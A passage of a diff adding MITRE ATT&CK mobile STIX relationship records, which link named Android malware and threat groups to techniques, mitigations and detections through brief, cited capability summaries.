"2019-10-15T19:54:10.284Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole geo-location data.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b360a1c8-8939-428e-bc6e-3f4755bd9ee0", + "created": "2020-10-29T17:48:27.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. 
Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:30:18.307Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can intercept SMS messages.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a77c56b-ed2c-4e43-bd0f-7acf9cce1952", + "created": "2020-04-24T17:46:31.564Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. 
Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:55.378Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can intercept SMS messages.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--81dbe111-0f02-49a1-9bba-42a31e6bb416", + "created": "2023-03-20T18:52:56.247Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:56.247Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6556536c-d5ea-4a3d-ae48-4016d4d762ff", + "type": "relationship", + "created": "2019-09-04T14:28:16.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-10-14T17:52:48.001Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can record the screen as the user unlocks the device and can take screenshots of any application in the foreground. [Monokle](https://attack.mitre.org/software/S0407) can also abuse accessibility features to read the screen to capture data from a large number of popular applications.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7260c8fe-6b3b-48a2-889f-f329fb5b4ef0", + "created": "2017-10-25T14:48:53.741Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security architecture improvements in each new version of Android and iOS make it more difficult to escalate privileges. 
Additionally, newer versions of Android have strengthened the sandboxing applied to applications, restricting their ability to enumerate file system contents.", + "modified": "2022-03-30T20:25:46.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7e2d9773-1320-4c8f-a595-2b92bf0fd8ed", + "created": "2019-07-10T15:35:43.668Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:55:00.294Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) accesses the device contact list.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d4154247-90ce-43b9-8c17-5c28f67617f5", + "type": "relationship", + "created": "2020-12-24T21:55:56.747Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.747Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed browser history, as well as the files for 15 other apps.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--529107fd-6420-4573-8dbf-cdcd49c2708c", + "type": "relationship", + "created": "2020-06-26T14:55:13.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T14:55:13.307Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can gather device network information.(Citation: Cybereason EventBot) ", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bdb29822-63c5-4dd0-961b-cdf3f2482adf", + "created": "2023-03-16T18:28:28.144Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:28:28.144Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3e3cad6c-dd73-43c9-bf99-d4796ba97fb1", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. 
Retrieved February 6, 2017.", + "source_name": "CrowdStrike-Android" + } + ], + "modified": "2020-03-20T16:37:06.668Z", + "description": "(Citation: CrowdStrike-Android)", + "relationship_type": "uses", + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a09f8daa-aa02-45f1-8dac-9bea355c9415", + "type": "relationship", + "created": "2020-11-10T17:08:35.819Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-11-10T17:08:35.819Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can access the device’s location and track the device over time.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8f22a4ce-f075-4343-acb0-1d45c56e91e8", + "created": "2022-03-30T18:06:21.355Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Symantec-iOSProfile2", + "url": "https://www.symantec.com/connect/blogs/apple-ios-103-finally-battles-malicious-profiles", + "description": "Brian Duckering. (2017, March 27). Apple iOS 10.3 Finally Battles Malicious Profiles. Retrieved September 24, 2018." + }, + { + "source_name": "Android-TrustedCA", + "url": "https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html", + "description": "Chad Brubaker. (2016, July 7). Changes to Trusted Certificate Authorities in Android Nougat. Retrieved September 24, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile OSes have implemented measures to make it more difficult to trick users into installing untrusted certificates and configurations. iOS 10.3 and higher add an additional step for users to install new trusted CA certificates and configuration profiles. 
On Android, apps that target compatibility with Android 7 and higher (API Level 24) default to only trusting CA certificates that are bundled with the operating system, not CA certificates that are added by the user or administrator, hence decreasing their susceptibility to successful adversary-in-the-middle attack.(Citation: Symantec-iOSProfile2)(Citation: Android-TrustedCA)", + "modified": "2022-03-30T18:06:21.355Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6209cccd-2877-4941-ac0c-bec3ba7a5544", + "created": "2022-04-05T19:40:25.071Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:40:25.071Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--644a19d3-c94f-40d9-87ac-02ef20b14eda", + "created": "2023-02-06T19:02:00.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:16:28.481Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can grant itself microphone permissions.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0cabc5f9-045e-490c-a97f-efe00dbade86", + "type": "relationship", + "created": "2020-01-27T17:05:58.276Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.276Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can record video.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6a5926f3-8c44-4806-83c2-e8ed0be36bc2", + "created": "2022-04-01T15:13:55.124Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be instructed to not open links in applications they don’t recognize.", + "modified": "2022-04-01T15:13:55.124Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01965668-d033-4aca-a8e5-71a07070e266", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "target_ref": 
"attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d7007bf2-fcd6-4327-9ffb-bdee5bdeb383", + "created": "2022-04-05T20:17:46.149Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:17:46.149Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--393e8c12-a416-4575-ba90-19cc85656796", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eef4ffb7-892d-4d3f-826c-0b78d1f22671", + "created": "2021-02-08T16:36:20.709Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has encrypted C2 communications using AES in CBC mode during Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "modified": "2022-04-18T16:07:26.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0727ac06-5b46-4f79-abe9-63c1b923d383", + "created": "2023-02-06T19:05:56.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:11.541Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has included encoded shell scripts to potentially aid in the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--45505ae7-0e54-4279-82c3-f92f4a832ed9", + "created": "2022-04-06T13:57:38.847Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:38.847Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcb3a139-f644-45c9-8123-dfea0455143a", + "type": "relationship", + "created": "2019-08-09T17:56:05.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + 
"description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.588Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) can record video and take photos via front and rear cameras.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--94e111fa-81d1-4882-ae73-4d6ad6367b9f", + "created": "2022-03-28T19:25:38.355Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates may contain patches that inhibit system software compromises.", + "modified": "2022-03-28T19:25:38.355Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e03b0eb5-32c6-4867-9235-77fe32192983", + "type": "relationship", + "created": "2019-09-04T15:38:56.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. 
(2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.071Z", + "description": " [FlexiSpy](https://attack.mitre.org/software/S0408) can track the device's location.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--947e2398-4565-4ae0-8cc2-fb0ef5f9c73f", + "created": "2019-12-10T16:07:41.083Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:03.081Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can enable installation of apps from unknown sources.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1c7d2d48-ea9a-448f-891f-66f635c95f73", + "type": "relationship", + "created": "2020-07-20T14:12:15.566Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Check Point-Joker", + "url": "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "description": "Hazum, A., Melnykov, B., Wernik, I.. (2020, July 9). New Joker variant hits Google Play with an old trick. Retrieved July 20, 2020." + } + ], + "modified": "2020-07-20T14:12:15.566Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) can collect device notifications.(Citation: Check Point-Joker)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22334426-e99f-4e97-b4dd-17e297da4118", + "created": "2020-12-24T21:55:56.696Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:23:54.777Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has captured SMS and MMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c5db5bb5-9877-43cd-8851-5aa62405dcb2", + "type": "relationship", + "created": "2019-11-21T16:42:48.497Z", + "created_by_ref": 